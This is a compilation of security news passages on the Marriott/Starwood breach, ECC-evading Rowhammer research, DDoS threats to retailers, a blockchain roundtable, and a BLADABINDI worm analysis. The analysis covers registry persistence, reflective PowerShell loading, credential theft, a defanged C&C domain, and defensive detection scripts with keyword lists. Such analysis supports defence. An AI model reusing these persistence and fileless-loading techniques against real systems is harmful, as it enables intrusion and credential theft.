"Marriott, the world’s biggest hotel company, said the huge hack had been going on since 2014"

FOUR YEARS!

1312 Days!

There is so much in this, where do you begin? #Marriott

― Daniel Cuthbert (@dcuthbert) November 30, 2018

Marriott has also had minor security issues in the past. Kevin Beaumont pointed back to past security incidents with Marriott wherein a remote access trojan located inside the company’s network had access to their Cyber Incident Response Team mailbox in 2017.

This is from 2017. Per @Marriott their breach started in 2014. In this screenshot a remote access trojan inside the Marriott has access to their Cyber Incident Response Team mailbox. https://t.co/swLW2jKKGB

― Kevin Beaumont (@GossiTheDog) November 30, 2018

Backlash

The incident has left infosec community members and hotel guests scratching their heads about how the hackers could have stayed undetected for four years.

“Four years of unauthorized access is an eternity for hackers, so members of the Starwood rewards program need to keep a close eye on their balances, as attackers will often try to steal and monetize rewards points,” said Ben Johnson, co-founder and CTO of Obsidian Security. “While the recognition of the breach and an apology are important steps forward, Marriott must upgrade its ability to detect compromises like this much faster, and should move swiftly to protect the rewards accounts and personal information of its loyal members.”

Brian Vecci, technical evangelist at Varonis, pointed to the breach as a “textbook” example of how hackers are becoming smarter about building persistence when they breach critical systems.

“Threat actors are smart and getting smarter so it’s hard to catch them in the act, but not only did Marriott fail to protect customer records, they failed to detect the leakage of this data since 2014,” he said. “This breach is a textbook example of attacker dwell time, and how once an attacker compromises an organization their goal is not typically to smash and grab, but to build persistence mechanisms and backdoors to stay in a network and continue to steal critical information year after year.”

Meanwhile, the New York Attorney General’s office declared it was opening an investigation into the Marriott data breach. “New Yorkers deserve to know that their personal information will be protected,” NY Attorney General Barbara Underwood said in a Tweet.

We’ve opened an investigation into the Marriott data breach. New Yorkers deserve to know that their personal information will be protected.

― NY AG Underwood (@NewYorkStateAG) November 30, 2018

Marriott said it will begin sending emails on a rolling basis starting today, November 30, 2018, to affected guests whose email addresses are in the Starwood guest reservation database.

Threatpost will be updating this breaking news story as it develops. Please check back for more.

The Magic Number 3: Flipping Three Bits at Once Enables Rowhammer Attacks


A group of researchers from the Netherlands has demonstrated that Rowhammer memory-manipulation attacks can be carried out while evading error-correcting code (ECC) protections.

What Is Rowhammer?

Back in 2015, Google's Project Zero team found that repeatedly charging and discharging memory cells in adjacent rows can change the value of an individual memory cell. If attackers know exactly where to strike, they can alter specific locations to inject instructions or commands into memory, or grant themselves access to restricted areas containing sensitive information.

The ECC protection mechanism was developed before Rowhammer appeared. ECC stands for error-correcting code, a type of memory storage that includes a control mechanism found in high-end RAM, usually deployed in expensive or mission-critical systems. ECC memory works by detecting and correcting single-bit changes, guarding against the kind of bit flips a Rowhammer attack causes.

Recently, a research team at the Vrije Universiteit Amsterdam said it has developed a practical way to precisely flip bits in server RAM chips without triggering ECC's correction mechanism. That lets them tamper with data, inject malicious code and commands, and change access permissions so that passwords, keys, and other secrets can be stolen.

The finding matters because, although ECC had been considered a reliable way to stop Rowhammer-style attacks, it had been argued that the defense could in theory be bypassed. That idea has now been confirmed.

As a result, malicious actors could use the team's technique for evading ECC on servers to extract information from these high-value targets with Rowhammer. Of course, they must first get into a position where they can flip bits on a vulnerable machine, which they might achieve with malware already present on the device.

The Magic Number 3

The Vrije Universiteit Amsterdam team confirmed an exploitable weakness in how ECC handles errors: when a single bit is changed, the ECC system corrects it, and when two changed bits are detected, ECC crashes the program.

But if three bits can be changed at the same time, ECC cannot catch the modification. This has long been known; the key here is demonstrating that it gives a Rowhammer attack an opening.

Crucially, the researchers found a situation resembling a race condition (where two or more processes read and write shared data and the final result depends on the precise timing of their execution), which convinced them the 3-bit-flip technique could be used to manipulate RAM addresses effectively.

The researchers observed that reading from a memory location where a bit flip has to be corrected generally takes longer than reading from an address that needs no correction. During the experiments they therefore tried each bit in turn until they found a word in which three vulnerable bits could be flipped. The final step was to make all three bits differ between the two locations and deliver the final blow, flipping all three bits in one go: mission accomplished.

The researchers said they were able to test and reproduce the vulnerability on four different server systems: three running Intel chips and one using AMD. They declined to name any specific memory brands.

Fortunately, while the attack is hard to prevent, it is also hard to carry out in practice. The Vrije Universiteit Amsterdam team had to comb through a large number of addresses to find vulnerable ones before actually performing the Rowhammer attack, and they said that on a busy system the attack could take as long as a week to succeed.

The researchers said their results should not be read as an indictment of ECC. Rather, they should show system administrators and security professionals that ECC is just one of several layers of protection, to be combined with other security mechanisms such as optimized hardware configurations and careful logging and monitoring.

ECC cannot stop Rowhammer attacks against every hardware combination; if enough bits are flipped, ECC only slows the attack down.

The paper describing the technique, "Exploiting Correcting Codes: On the Effectiveness of ECC Memory Against Rowhammer Attacks," will be formally presented at the Symposium on Security and Privacy next year.

E-commerce sites warned of heightened DDoS threat


Distributed denial of service (DDoS) attacks reached their highest levels in November on two of the busiest online trading days of the year, statistics show.

On Black Friday, DDoS protection provider Link11 saw DDoS attacks on e-commerce providers increase by more than 70% compared with other days in November. On Cyber Monday, attacks increased by 109% compared with the November average.

Several attacks observed during Black Friday and Cyber Monday reached up to 100 Gbps, with the average attack on both days just under 6 Gbps, compared with an average of 4.6 Gbps for the months of July to September, which itself represented a 40% increase on the previous quarter.

According to Link11, attacks approaching 6 Gbps “far exceed” the capacity of most websites. In the light of that fact, Link11 is warning online merchants, payment providers and logistics companies to expect further large-scale DDoS attacks in the run-up to the Christmas break.

Marc Wilczek, managing director of Link11, said the e-commerce industry has high expectations of the Christmas trading period. “Both criminals and competitors will take this as an opportunity to cause disruption to or extort the e-commerce industry.

“The growing ‘cybercrime-as-a-service’ sector favours this development. Online retailers should take action now to strengthen their IT security defences against DDoS attacks, in advance,” he said.

To ensure they are better protected against DDoS attacks, which could see them out of business for hours and even days, e-commerce providers can either invest in expanding their infrastructure to absorb peak loads with their own resources or deploy an adaptable cloud defence system.

If e-commerce providers choose the first option, they risk DDoS attackers being able to deliver ever greater attacks to overwhelm services, putting companies with online infrastructures that offer delivery and or payment processing services at risk to DDoS incidents in the run-up to the Christmas holiday.

“Forward-looking companies will benefit from investing in scalable, cloud-based protection solutions to counteract targeted overloads caused by DDoS attacks. Information about website and server failures spreads quickly across social platforms as well as complaints about long loading times. All this can contribute to further revenue losses and long-term reputational damage,” said Wilczek.

Research by German industry association Bitkom found that cyber attacks cost retailers an average of €185,000, including the costs of IT repair, loss of sales revenue and reputational damage to the business.

According to Bitkom, IT repairs typically cost €13,000, while €18,500 is the average cost of enlisting a team of specialist internet providers to restore the business’s online operations, the loss of sales over 48 hours is typically €135,000, and the value of funding reputational damage limitation measures such as a public relations and marketing campaign is around €18,500.

In April 2018, a survey of more than 300 security professionals worldwide found that the majority of respondents cited the loss of customer trust and confidence, the risk of intellectual theft and the threat of malware infection as the most damaging effects on business arising from DDoS attacks, with 78% identifying the loss of customer trust and confidence as the single most damaging effect on business of DDoS attacks.

Any online business or application is vulnerable to DDoS attacks, according to Harshil Parikh, director of security at software-as-a-service platform firm Medallia.

However, there are ways of detecting and mitigating DDoS attacks that any business dependent on the internet can and should use, he told the Isaca CSX Europe 2017 conference in London.

It is important that such organisations take time and effort to build their DDoS defence capabilities, he said, because DDoS attacks are fairly easy and cheap for attackers to carry out.

“With the advent of botnet-based DDoS attack services that will be effective against most companies, anyone can target an organisation for just a few bitcoins,” said Parikh. “Competitors and even disgruntled employees are able to carry out DDoS attacks that can result in loss of reputation as well as lost business worth a lot more than the attacks cost,” he said.

How Hackers View the Development and Challenges of Blockchain Technology in 2019


Original title: How Hackers View the Development and Challenges of Blockchain Technology in 2019

Blockchain technology drew enormous attention in 2018, a year in which the blockchain industry both exploded and churned. Lately the token market has cooled and the bear market rules; some believe blockchain is already "done for," while others still have deep faith in the technology. At bottom, blockchain is an emerging frontier technology, and what we really want to know is how hackers from different fields judge its current state and think about its prospects: how do they view the development and challenges of blockchain technology in 2019?

On November 28, at the P.O.D summit hosted by Odaily星球日报 with the 36Kr Group as strategic co-organizer, Bitmain senior engineer Jiang Heping, 八维资本 research director Wei Ran, Chaitin Tech (长亭科技) security researcher Zhang Jingchi, Ever Chain founder & CEO Jia Yongzheng, and DoraHacks partner Yue Hanchao held a roundtable discussion on "How Hackers from Different Fields View the Development and Challenges of Blockchain Technology in 2019."

Moderator:

Yue Hanchao, partner at DoraHacks

Panelists:

Jiang Heping, senior engineer at Bitmain

Wei Ran, research director at 八维资本

Zhang Jingchi, security researcher at Chaitin Tech (长亭科技)

Jia Yongzheng, founder & CEO of Ever Chain

The following is a transcript of the roundtable:

(Moderator) Yue Hanchao: It's a real honor today. Thanks to Odaily and 36Kr for inviting us to hold this roundtable, and special thanks to our four hackers from different backgrounds for making time to be here: Jiang Heping from Bitmain, research director Wei Ran from 八维资本, security researcher Zhang Jingchi from Chaitin Tech, and Jia Yongzheng from Ever Chain. Could the four of you first introduce yourselves: what do you normally work on, and what have you been busy with lately?

Jiang Heping: Hello everyone, my name is Jiang Heping. I'm an R&D engineer at Bitmain. I've been doing technical R&D for the past several years and entered the blockchain industry about a year ago, focusing mainly on public-chain research and development. We've recently been working on two things: first, we redesigned and implemented a new client node software for a public chain; second, we built a smart-contract platform for it based on a layer-2 network architecture.

Wei Ran: Hello everyone, I'm Wei Ran from 八维资本, a cross-border blockchain investment firm with offices in San Francisco and Beijing. We've already invested in more than 40 blockchain infrastructure projects and made a number of strategic investments, including Odaily and DoraHacks. We're not only an early-stage investor but also run investment-banking and advisory businesses, and we're currently making a deep push into the security token industry, hoping to open a channel between the traditional world and the crypto world. Thank you.

Zhang Jingchi: Hello everyone, I'm a security researcher at Chaitin Tech. I was previously in academia; my advisor was Professor Matthew Green, one of the principal designers of Zcash. After leaving, I joined Chaitin to work on blockchain security. Previously clients would come to us, so security felt passive; later we decided to do some things proactively. What we've been doing recently is monitoring the whole blockchain trading market, plus more academic work such as using formal verification to check whether code is sufficiently secure.

Jia Yongzheng: Hello everyone, my name is Jia Yongzheng. I was a 2009-intake undergraduate in Tsinghua's computer science pilot class (the Yao Class) and a PhD student at the Institute for Interdisciplinary Information Sciences. Ever Chain is building a decentralized social ecosystem. My earliest research was on computer network optimization, then online education and game theory. I started working on social networks the year before last, mainly research related to online dating, began doing blockchain research in 2016, and later switched full time to AI, including recommendation algorithms for social networks.

We have two core applications in this social ecosystem. One is Ever 联动, a product supporting blockchain events, news, and tech education, and also the DApp everyone used today to sign in and collect their queue number. The other is a blockchain-based app for meeting new people that we're about to launch; it has already entered closed beta. We hope blockchain technology can reshape parts of the traditional internet, and we're exploring how some fairly innovative ideas can be deeply integrated with blockchain and land in real life.

(Moderator) Yue Hanchao: I know a bit about each of our guests; for example, Wei Ran was one of the founders of the DAOONE community, and Yongzheng was one of the initiators of 慕客 (MOOC). You've all been through a lot this year. Having entered this industry early and arrived at the end of November, how do you view this year's development of blockchain? Second, a lot has been shared today about new rules, standards, and developments in the industry, and we all know its growth has met some resistance. Where do you think the biggest pain point holding the industry back lies? For instance, what has been the biggest difficulty you've run into in your day-to-day work or in building your businesses?

Jiang Heping: I'll share my view mainly from a technical angle. Everyone has felt how dramatically the market's scale and prices have swung this year, but from a practitioner's perspective, 2018 produced plenty of new technical innovation: new consensus algorithms, new advances in cryptography, and developments such as the EOS public chain that gave us many new insights. Throughout this development we've felt that the industry's infrastructure, especially for public chains, is still weak; in performance, usability, and supporting tooling it remains far behind the internet. That gap won't be closed in a day or two; it will take continued progress from everyone in the field.

From my own experience, a lot changed over the past year. On public chains, applications used to be very limited: a bit of speculation and some transfers. But this year many traditional financial institutions have kept entering the industry, whether in investment, technology, or services, and more importantly their thinking has shifted. The entry of so much traditional financial muscle is itself a vote of confidence in the technology. Their arrival will push the whole blockchain business in a broader, more solid direction, and will push the underlying technology to support them better and evolve faster. Thank you.

Wei Ran: First, freedom has limits; second, growth takes time.

First, freedom needs limits. We observe that everything from Bitcoin to the so-called ICO, essentially equity crowdfunding with no barriers to entry, emerged in an environment lacking regulation. The excess profits came mainly from cross-border arbitrage, policy arbitrage, and what might be called time arbitrage, meaning that whether the innovation is technological or financial, regulation always lags behind. Moreover, because financial activity is now cross-border, territorial and sector-based regulation is no longer well suited to these new financial forms. But freedom has limits; otherwise bad money drives out good. We believe the blockchain development worth backing is the compliant kind, or at least the kind that moves toward fintech-style regulation.

Second, development takes time. We think of blockchain as an infant that is still growing up. We previously published an article on blockchain's three waves. We believe we have already seen the first wave, transfers and payments represented by Bitcoin; the second wave is equity-style fundraising represented by Ethereum and ICOs; and we believe the third wave will be represented by security tokens, which connect the crypto world with the traditional world and let blockchain grow larger within an environment of bounded freedom.

Zhang Jingchi: The previous two speakers put it very well; I'd like to add to a point Ms. Wei made. Looking back at the period before 2018 and the end of 2017, interest in blockchain was surging and projects were starting to land one by one, but that was only the first year of the boom, which arguably began with Ethereum's smart contracts. From Bitcoin to Ethereum there was a period of accumulation, and only with Ethereum did people gradually start to enter the space. Even though Satoshi Nakamoto published the paper in 2008, the blockchain industry has only been developing for a few years; it's a long process.

Let me speak from the security angle. Because the field is young and everyone is focused on shipping products, all kinds of security problems appeared in the earliest stage, for example The DAO in 2016, with losses of roughly US$150 million. But from our recent contact with vendors we find their security awareness keeps rising. We used to do only contract security; now we also have security solutions at the public-chain and wallet level. People have improved in their applications, their thinking, and their security awareness, which I think reflects very well on blockchain security overall. That's it, thanks.

(Moderator) Yue Hanchao: Did Chaitin start its blockchain business this year?

Zhang Jingchi: Chaitin has been around for four or five years, but the blockchain business started this year.

(Moderator) Yue Hanchao: Do you feel business now is heavier than in June and July, or a bit lighter?

Zhang Jingchi: Honestly, just look at the state of the token market and you'll know. But I think it's a good sign; only when the tide goes out do you find out who has been swimming naked. At first it was bad money driving out good: everyone saw a craze and rode the hype, and those people made the whole coin and chain scene extremely frothy. But the ones who remain in the end are the ones who genuinely want to get things done, which is a very good sign. When we look at the code they write or talk with them, they really are a group of people who want to make a real contribution in this area.

(Moderator) Yue Hanchao: The reason Jingchi is here today rather than Xiaohang is that Xiaohang told me at three in the morning yesterday that he had to travel for work, so it sounds like your business is keeping you pretty busy.

Jia Yongzheng: This year I've worked on technology, products, and research, and found that blockchain became active starting at the end of last year. Developers discovered it isn't an empty concept but something with flexible use cases. Developers of different applications entered one after another, but quickly grew confused. Some products inherently carry new investment, gambling, and similar attributes, yet once you study them carefully you find they may gradually reduce to a Ponzi-scheme model: fewer and fewer latecomers are willing to buy in, and only a tiny minority of participants profit in such a market.

After the market went quiet, coming back to the technology itself, the first question is why blockchain must be used at all and what should be solved on-chain. The second question is decentralization. Traditional internet products benefit from economies of scale, which gives them a natural efficiency advantage. The benefit decentralization may bring is more transparent information and therefore more trust, and to some extent more fairness, but at the cost of efficiency. In the early stage of an industry or technology, efficiency really does matter more, so when we look at the various public chains, each has its own strength; some sacrifice decentralization to pursue efficiency, for example EOS with its DPoS consensus algorithm. The different solutions push out the utility frontier of the so-called impossible triangle to some degree, organically combining efficiency, security, and decentralization; it is really a multi-objective optimization problem.

Different applications emphasize different metrics in different business scenarios. In particular, we find that when a project actually lands as a product it may not depend that much on decentralization; for an internet product, the early stage actually requires quickly assembling some centralized resource advantages.

I think blockchain products have a very high barrier to entry for users who understand the internet but not blockchain. Sometimes this shuts out the vast majority of internet users, which puzzles me a great deal. When you build a blockchain product, you end up weighing all sorts of problems just to get internet users to accept your DApp.

(Moderator) Yue Hanchao: I have a question for Yongzheng, since I left school a long time ago. Yongzheng, you come from academia, and we really want to know what the most advanced students at universities think about blockchain. We see globally leading university communities like Blockchain@Berkeley, the Stanford Blockchain Collective, the MIT Bitcoin Club, and various Blockchain Societies in India and across Europe driving the blockchain industry and building up their local communities. We can see teams at Chinese universities doing solid work, but we haven't seen a community that really leads the industry, leads community development, and speaks up regularly. So I'm curious, since you're closer to them and your team surely includes many of their students: what is their attitude?

Jia Yongzheng: First of all, I think blockchain technology is very hard. As Professor Xu said today, it brings together the most cutting-edge problems in computer science, including distributed systems, cryptography, game theory, and mechanism design. Doing really deep research in any one of those areas is challenging; having done some blockchain research myself, I can say it isn't simple. A systems PhD tends to be harder than other directions and takes six years; cryptography is easy to enter but hard to go deep in; game theory has its own theoretical framework, and blending it into cryptography, or even doing mechanism design on top of distributed systems, is extremely challenging. So every one of these research directions contains very deep topics worth pursuing. That's why I think blockchain research gives people from different areas of computer science a great opportunity to collaborate. Some public-chain projects are strong in systems, others in cryptography; in effect it gathers the best researchers in each field from around the world.

So we see that no matter how depressed the blockchain token market is, the blockchain academic community is extremely active, including several top international blockchain groups, and outstanding young researchers from different fields are all coming to work on this, which is exciting. Compared with AI, where the bar is very high and work at a certain level concentrates in a few mainstream international circles, blockchain attracts people from different fields, which is a very good thing. Also, in the long run the technology addresses not just technical problems but many social and philosophical ones as well.

(Moderator) Yue Hanchao: Excellent. We just talked about the difficulties each of you ran into as the industry developed in 2018, and the whole market right now can fairly be called a winter. How will Bitmain, 八维, and Chaitin keep going through the winter next year, and what are your next plans? Could you share them with us?

Jiang Heping: By the look of it, the market won't reverse dramatically in the short term, which is actually a great opportunity for the technology: everyone can settle down and get the most valuable, most difficult things done well. Next year we hope to build out the smart-contract platform and infrastructure on the public chain, giving users and developers a lower barrier to entry, friendlier interfaces, and so on. Once that's done, we also hope to work with business partners to land real businesses on the blockchain platform so the technology can truly show its value, in directions people are optimistic about, such as STOs and tokens in finance and integrations with gaming. That's what we want to do next year.

(Moderator) Yue Hanchao: OK, Heping is taking a very down-to-earth, product-first approach. Wei Ran?

Wei Ran: A capital winter is just a season; finance always talks about cycles, with peaks and troughs. In a trough, whichever direction you move is uphill, so it takes work and it's exhausting. But what's really happening is that a chaotic, disorderly market is becoming more orderly and moving in a good direction, so we think the short term is a trough while, over the long run, both the technology and the market are improving.

If technology is an infant, then we are the petri dish: changes in temperature affect how fast the technology grows, and even whether it survives or dies young. Many of the projects we invested in earlier are Silicon Valley infrastructure plays. Universities were mentioned just now: when professors from Stanford or MIT leave to start companies, plenty of venture funds chase them with money. That is an excellent season and an innovation environment that lets emerging industries thrive. We hope to create that kind of environment for Chinese founders too.

Our other way of dealing with the winter is to hunt new prey. Our recent deep push into the security token industry is about letting more people access digital assets within a compliant framework; the advantage of compliance is that institutional money can enter the market, which is the starting point of the next bull run. That's about it.

Zhang Jingchi: I agree with Wei Ran that the market as a whole is heading in a good direction. Coin prices grabbed everyone's attention, and as Yongzheng said, outstanding talent from every industry entered the space. What caught eyes at first may have been prices or other gimmicks, but as a blockchain security practitioner, the other wave that caught my eye this year was the wide variety of DApps and some very good public chains.

You can say blockchain differs from other technologies, but you can also say it's the same. We work on security, and on the job clients care about whether their contracts and public chains are secure. But as blockchain matures, everyone will realize it isn't that different from traditional industries: whatever blockchain looks like, the underlying network ecosystem and some very low-level things don't change. Even if the contracts and the public chain are secure, if the employees who hold the company's keys behave very insecurely, the whole thing is still insecure.

What Chaitin is doing now is giving clients a complete package: from the lowest-level code, the network environment, how to design sandboxes, and how to go on-chain, all the way up to the top-level code; a complete bottom-to-top security solution. That's what we'll push harder on in 2019. Overall I think 2019 will still make plenty of waves, because in 2018 we saw some excellent public chains; even though coin prices aren't great, I think the overall trend for 2019 is very good. Thanks.

Jia Yongzheng: Blockchain started out with a single application scenario and then went through a quiet spell; in 2014 and 2015 no core application was found, and only when Ethereum arrived did a flood of applications appear.

Earlier, many teams said they were going to build a public chain, each claiming to solve blockchain's hardest problems: the impossible triangle, dramatically better metrics across the board, strong decentralization alongside high performance and privacy protection, and so on. Now they're actually lost, because however good the story sounds, with dazzling solutions and all kinds of scaling and privacy projects, very few have actually landed. There are several hundred public-chain projects now, and perhaps only a single-digit number will survive, so this track basically doesn't offer many opportunities any more. Let me make a few predictions. I think that in 2019, first, a large number of public-chain projects will start considering building DApps themselves, or customizing for specific industries, and in that trend I think consortium chains will develop faster than public chains.

Why do I think so? First, the public-chain track is very crowded and the survivors will be few. In reality a public chain's users are the developers building on it, not end users; if nobody champions your chain's vision, there are no end users. So a public chain is one layer removed from actual end users, and public-chain developers will gradually find they need to offer solutions directly to users.

Our goal is to improve the whole experience of meeting new people for millions of users, so we chose to face users directly and build the DApp ourselves. Right now the vast majority of public chains have no third-party developers willing to use them; they need to build DApps themselves to deliberately guide developers, or optimize their chains from the perspective of DApp developers.

Second, although everyone is building general-purpose base-layer public chains now, once the dividends of that track are gone they will customize for different industries. We find that in good projects aimed at healthcare or education, the token actually doesn't play a particularly large role. Much of the 2B customization adopts consortium-chain solutions, because consortium chains clearly embrace regulation better, so consortium chains will surely land in 2B scenarios faster than public chains, especially in industry-specific 2B customization. Based on these two judgments, I think 2019 overall will be very good for the enterprise-chain market, while the public-chain market will go through a fairly obvious survival-of-the-fittest reshuffle. Some killer DApps may well appear this year, and their user numbers will be nothing like what you see now. The blockchain applications we see today, games on Ethereum and EOS, cryptocurrency exchanges and so on, have daily active users only in the tens of thousands; DApps at the million-user scale will come. So the two future directions, real industry customization on the 2B side and consumer DApps with million-level activity on the 2C side, will let people truly see the future of the blockchain industry.

Source: 36Kr. The article represents the original author's views and does not represent the position of BB财经.

Attack and Defense Frontline: New BLADABINDI Worm Spreads a Fileless Backdoor via Removable Drives



BLADABINDI, also known as njRAT or Njw0rm, is a remote access trojan (RAT) with numerous backdoor capabilities, from keylogging to carrying out distributed denial-of-service (DDoS) attacks. Since it first appeared, the trojan has been recompiled and reused in all kinds of cyber-espionage campaigns. In fact, BLADABINDI's customizability, and the fact that it can be bought on dark-web underground markets, has made it a widespread threat. Case in point: last week Trend Micro encountered a worm (detected by Trend Micro as Worm.Win32.BLADABINDI.AA) that propagates via removable drives and installs a fileless version of the BLADABINDI backdoor.

Although Trend Micro says it is not yet clear how the malicious file gets planted on infected systems, its propagation routine indicates that it arrives via removable drives. Beyond that, BLADABINDI's use of AutoIt, a flexible and easy-to-use scripting language, is also noteworthy. It uses AutoIt (the FileInstall command) to compile the payload and the main script into a single executable, which makes the payload (the backdoor) difficult to detect.


Figure 1. Screenshot showing common traces of a compiled AutoIt script (highlighted)

Technical Analysis

Using an AutoIt script decompiler to recover the executable's AutoIt script, Trend Micro found that the script's main function first deletes every file named "Tr.exe" in the system's %TEMP% directory so it can drop its own version of Tr.exe. The dropped file is executed after all processes with the same name have been terminated. It also drops a copy of itself into the same directory. To establish persistence, it adds a shortcut to the file in the %STARTUP% directory.

To propagate, it drops hidden copies of itself onto every removable drive found on the infected system. At the same time it drops a shortcut file (.LNK) and moves all of the files originally on the removable drive from its root directory into a newly created folder named "sss".


Figure 2. Code snapshot showing the decompiled script


Figure 3. Code snapshot showing how AutoIt's FileInstall command bundles an AutoIt script with arbitrary files, which are then loaded while the script executes


Figure 4. Code snapshot showing how the shortcut is added (top) and how the worm spreads via removable drives (bottom)

放入的Tr.exe实际上是另一个经AutoIt编译的可执行脚本(Trojan.Win32.BLADABINDI.AA)。对它进行反编译,可以看到它包含一个base-64编码的可执行文件,它将在注册表HKEY_CURRENT_USER\Software中的一个名为“Valuex”的注册表值中写入。

It also creates another value to establish persistence: an autorun registry entry named "AdobeMX" (under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run) that launches PowerShell, which loads the encoded executable via reflective loading, i.e. loading the executable from memory rather than from the system's disk.

Because the executable is loaded into PowerShell's memory directly from the registry, the researchers were able to dump the specific address where the malicious executable resides. Trend Micro found that it was compiled with .NET and obfuscated with a commercial code-protection tool.
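As a rough illustration of how a defender might hunt for this persistence technique, the following Python sketch (Windows-only, standard-library winreg; the "AdobeMX"/"Valuex" names come from the analysis above, while the PowerShell keyword heuristics are our own assumption rather than a Trend Micro tool) enumerates the current user's Run key for PowerShell-based loaders and looks for the embedded payload value:

# Illustrative only: flag Run-key entries that launch PowerShell and the
# "Valuex" payload value described above. Windows-only (winreg).
import winreg

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
SUSPICIOUS = ("powershell", "-enc", "frombase64string", "reflection")

def iter_values(root, path):
    # Yield (name, data) for every value under the given key; empty if missing.
    try:
        with winreg.OpenKey(root, path) as key:
            index = 0
            while True:
                try:
                    name, data, _type = winreg.EnumValue(key, index)
                except OSError:
                    break
                yield name, data
                index += 1
    except FileNotFoundError:
        return

def main():
    # 1. Autorun entries that invoke PowerShell (e.g. the "AdobeMX" loader).
    for name, data in iter_values(winreg.HKEY_CURRENT_USER, RUN_KEY):
        text = str(data).lower()
        if any(marker in text for marker in SUSPICIOUS):
            print(f"[!] Suspicious autorun entry {name!r}: {data}")
    # 2. The base64-encoded payload stored as "Valuex" under HKCU\Software.
    for name, data in iter_values(winreg.HKEY_CURRENT_USER, "Software"):
        if name.lower() == "valuex":
            print(f"[!] Possible embedded payload value {name!r} ({len(str(data))} characters)")

if __name__ == "__main__":
    main()

A script like this is no substitute for endpoint protection, but it highlights how little the fileless payload leaves on disk: the durable artifacts are registry values, not files.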


Figure 5. Screenshot showing PowerShell loading the encoded executable

BLADABINDI/njRAT payload

The BLADABINDI backdoor variant uses water-boom[.]duckdns[.]org as its command-and-control (C&C) server, on port 1177. As with earlier BLADABINDI variants, the URL associated with this fileless version's C&C server uses the dynamic domain name system (DNS), which lets the attackers hide the server's actual IP address or change/update it as needed.

All files downloaded from the C&C server are stored in the %TEMP% folder as Trojan.exe. The backdoor uses the string 5cd8f17f4086744065eb0992a09e05a2 as its mutex and as its registry hive on the infected machine. It uses the value tcpClient_0 for its HTTP server, to which it would send all information stolen from the infected machine; however, because that value is set to null, the stolen information is instead sent to the same C&C server.

When the backdoor runs, it creates a firewall policy that adds PowerShell's process to the whitelist. The backdoor's capabilities, shown in Figure 7, include keylogging, retrieving and executing files, and stealing credentials from web browsers.


Figure 6. Code snapshots showing the BLADABINDI variant's configuration (top) and how it creates a firewall policy to whitelist PowerShell (bottom)


Figure 7. The backdoor capabilities of this BLADABINDI variant

Best practices

This worm's payload, propagation method, and technique of delivering the backdoor filelessly on infected systems make it a significant threat. Users, and especially enterprises that still use removable media at work, should take the necessary precautions: restrict and secure removable media and USB functionality, restrict tools such as PowerShell (particularly on systems holding sensitive data), and proactively monitor gateways, endpoints, networks, and servers for anomalous behavior and indicators such as C&C communication and data exfiltration.

IoC

Related hashes (SHA-256):

c46a631f0bc82d8c2d46e9d8634cc50242987fa7749cac097439298d1d0c1d6e - Worm.Win32.BLADABINDI.AA
25bc108a683d25a77efcac89b45f0478d9ddd281a9a2fb1f55fc6992a93aa830 - Win32.BLADABINDI.AA

Related malicious URL:

water[-]boom[.]duckdns[.]org (C&C server)
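For readers who want to sweep a quarantined removable drive or a file share against the published hashes, the minimal Python sketch below (the digests are copied from the IoC list above; everything else is illustrative and not a replacement for an AV engine) walks a directory tree and reports SHA-256 matches:

# Illustrative IoC sweep: report files whose SHA-256 matches the published hashes.
import hashlib
import sys
from pathlib import Path

IOC_SHA256 = {
    "c46a631f0bc82d8c2d46e9d8634cc50242987fa7749cac097439298d1d0c1d6e",  # Worm.Win32.BLADABINDI.AA
    "25bc108a683d25a77efcac89b45f0478d9ddd281a9a2fb1f55fc6992a93aa830",  # Win32.BLADABINDI.AA
}

def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def scan(root: Path) -> None:
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        try:
            if sha256_of(path) in IOC_SHA256:
                print(f"[!] IoC match: {path}")
        except OSError:
            continue  # locked or unreadable file, skip it

if __name__ == "__main__":
    scan(Path(sys.argv[1] if len(sys.argv) > 1 else "."))

Run it as, for example, python ioc_sweep.py E:\ against the drive or folder you want to check.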

Disclaimer: This article comes from 黑客视界; copyright belongs to the author. The content represents the author's independent views only and does not represent the position of 安全内参. It is republished to share more information; for reprints, please contact the original author for authorization.

Marriott's Starwood Data Breach - 5 Steps to Protect your Data

What can you do if you’re one of the 500 million Marriott International Inc. guests affected by the massive data breach announced today? According to the company’s announcement, the breach affects guests who stayed at Marriott’s Starwood properties from 2014 through Sept. 10, 2018. For approximately 327 million of the impacted guests, Marriott says the breached information includes some combination of:

Mailing address
Phone number
Email address
Starwood Preferred Guest (“SPG”) account information
Birthdate
Gender
Arrival and departure information
Reservation date
Communication preferences

Credit and debit card numbers were also included in the breach. While Marriott notes this information was encrypted according to the AES-128 standard, they do not yet know if the components required to decrypt these numbers have been compromised.
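To see why those “components” matter, here is a small sketch using the third-party Python cryptography package. It uses AES-128 in GCM mode purely for illustration (Marriott has not disclosed which mode it uses); the point is that the ciphertext, which is what a database thief copies, is unreadable without the key:

# Hedged illustration: AES-128 ciphertext alone does not expose the card number.
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=128)   # the secret "component"
nonce = os.urandom(12)                      # per-record random nonce
card_number = b"4111 1111 1111 1111"        # test number, not a real card

ciphertext = AESGCM(key).encrypt(nonce, card_number, None)
print(ciphertext.hex())                     # what the attacker sees in the dump

# Only someone holding the key (and nonce) can recover the plaintext:
print(AESGCM(key).decrypt(nonce, ciphertext, None))

That is also why Marriott's uncertainty is the real story: if the decryption components were stored alongside the data and were taken too, the encryption buys the affected guests very little.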


[Image source: Apple]

If you’ve made a reservation at a Starwood property in the last four years (this includes Sheraton, Westin, Four Points, many other brands, and Starwood-branded timeshares), take these steps to minimize your exposure:

Change your password. This should be your default response to the news of any hack that might involve your information. If you use the same password in multiple places, be sure to change your password everywhere.

Implement Multi-factor Authentication (MFA). A breached password is only useful if the bad guys can use it. A second step of authentication, like a code sent via SMS to your phone, can render that breached password useless (but you should still change your password).

Monitor your accounts. Marriott’s system was compromised for an extended period of time. Check your accounts weekly.

Consider freezing your credit. You can put a credit hold on your accounts, but in most U.S. states the hold remains in place until you request a thaw. This guide from NerdWallet provides more details.

